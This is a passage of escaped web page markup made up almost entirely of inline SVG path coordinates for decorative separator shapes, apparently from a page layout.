d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-